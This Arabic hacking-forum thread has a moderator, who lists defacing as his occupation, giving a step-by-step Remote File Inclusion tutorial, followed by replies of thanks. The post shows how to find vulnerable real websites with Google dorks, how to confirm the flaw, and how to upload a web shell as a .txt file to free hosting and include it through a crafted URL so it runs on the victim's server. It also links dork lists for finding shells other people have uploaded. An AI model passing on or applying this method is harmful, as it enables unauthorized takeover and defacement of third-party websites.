1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة

شرح ثغره rfi


الموضوع في '[ الـثـغـرات ]' بواسطة NETJOURNAL, بتاريخ ‏12 أكتوبر 2014.

الكاتب : NETJOURNAL | المشاهدات : 749 | الردود : 13
الوسوم:
حالة الموضوع:
مغلق
  1. NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    PHP
    السلام عليكم و رحمه الله و بركاته
    كيف حالكم شباب انشاء الله بخير جميعا .
    حبيت اقدملكم شرح مبسط عن ثغره Remote File Inclusion ~RFI
    ++++++++++++++++++++++++++++++++++++++++++++++
    رح نتعلم الأتي :-
    # البحث عن مواقع مصابه.
    # التأكد من اصابه الموقع.
    # استغلال الثغره ( استعراض الشل ).
    +++++++++++++++++++
    [#] البحث عن مواقع مصابه ..!
    يتم البحث عبر الدوركات Google Dorks.
    سيتم ارفاق تجميعه دوركات للبحث .

    +++++++++++++++++
    [#] التأكد من اصابه الموقع ..
    بعد وضع الدورك المخصص في غوغل..نختار اي موقع ..
    بعد الدخول للموقع نلاحظ ان رابط الموقع ينتهي بـــ
    action.php?page=any thing

    بسهوله نقوم بحذف ما بعد علامه المساواه (=)
    و نضع بدله اي موقع يجي ع بالنا بهذا الشكل http://www.site.com ..مثلا
    index.php?page=http://iq-team.org
    ونلاحظ لو بقى الموقع على حاله او ظهر خطأ يعني الموقع مو مصاب ندور غيره .
    و لو أظهر لنا و حولنا ع موقع عراق تيم يبقى الموقع مصاب و الأمور تمام..

    ++++++++++++++++++++++++++++++++++++++++++++++
    [#] استغلال الثغره ّ
    كل الي نقدر نعمله حاجتين ؟
    اول نروح ع استضافه مجانيه و نشترك و نعمل دومين من نفس الموقع و رح يعطوك لوحه CPanel تدخل و ترفع شل بصيغه
    txt
    ===============
    ثانيا استخدام دوركات للبحث عن شلات مرفوعه بصيغه txt
    ===============
    الأن كل الي علينا نجيب رابط الموقع الي رفعنا عليه شل بصيغه تيكست و نعمل هكذا.

    www.target.com/index.php?page=http://www.site.com/shell.txt؟

    لازم نظيف علامه الأستــفهام (؟) بعد ?txt
    ?shell.txt
    تم استعراض الشل بنجاح .

    ++++++++++++++++++++++++
    :ُeُeِq:دمتم بود . موفقين.:ُeُeِq:
    ++++++++++++++++++++++++
    لتحميل دوركات البحث!

    RFI DORKS&shell.txt dorks




     
  2. Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,783
    نقاط الجائزة:
    255
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 7
    رد: شرح ثغره rfi

    وعليكم السلام ورحة الله
    بارك الله بيك
    شرح كافي ووافي
     
  3. KaDiM aL-iRaQi ExpertDeveloper ExpErt DeveloPer

    الأنتساب:
    ‏2 سبتمبر 2014
    المشاركات:
    680
    الإعجابات المتلقاة:
    24
    نقاط الجائزة:
    50
    رد: شرح ثغره rfi

    عشت خوي ربي يوفقك ً#ٌ5oًًًُ.
     
  4. 3mran Developer

    الأنتساب:
    ‏2 ابريل 2012
    المشاركات:
    70
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:
    30
    رد: شرح ثغره rfi

    يعطيـك العافية
    بـارك الله فيـك
    جاري التقييم ان أمكن
     
  5. mr.grey hat Developer

    الأنتساب:
    ‏7 أكتوبر 2014
    المشاركات:
    29
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    رد: شرح ثغره rfi

    بسم الله الرحمن الرحيم

    ماشاء الله عليك ي أخ iraq spy مبدع كعادتك وشرحك سهل ومبسط ومفهوم تقبل مروري أخي :)
     
  6. TeePlow V • I • P

    الأنتساب:
    ‏12 مارس 2014
    المشاركات:
    400
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: شرح ثغره rfi

    السلام عليكم
    بارك الله فيك حبيبي شرح رائع
     
  7. MJHOOL Developer

    الأنتساب:
    ‏6 يونيو 2012
    المشاركات:
    29
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: شرح ثغره rfi

    الله يعطيك العافية يابطل
     
  8. Mstr Yaser <span style="font-weight: bold; text-shadow: #BBBB موقوف لمخالفة الشروط

    الأنتساب:
    ‏21 نوفمبر 2014
    المشاركات:
    353
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    Facebook:
    YouTube:
    رد: شرح ثغره rfi

    شرح رائع يعطيك العافية
     
  9. MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    90
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    C#
    Facebook:
    YouTube:
    رد: شرح ثغره rfi

    بارك الله بيك شرح رائع
     
  10. Mokhalad HaXor آداريً شؤون الأعضًاء

    الأنتساب:
    ‏3 يوليو 2012
    المشاركات:
    3,319
    الإعجابات المتلقاة:
    2,463
    نقاط الجائزة:
    255
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:
    etc/shadow
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    PHP
    Facebook:
    YouTube:
    رد: شرح ثغره rfi

    تسلم الايادي شرح جميل جدآ , واكثر من واضح :{11}: :{11}: :{11}:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة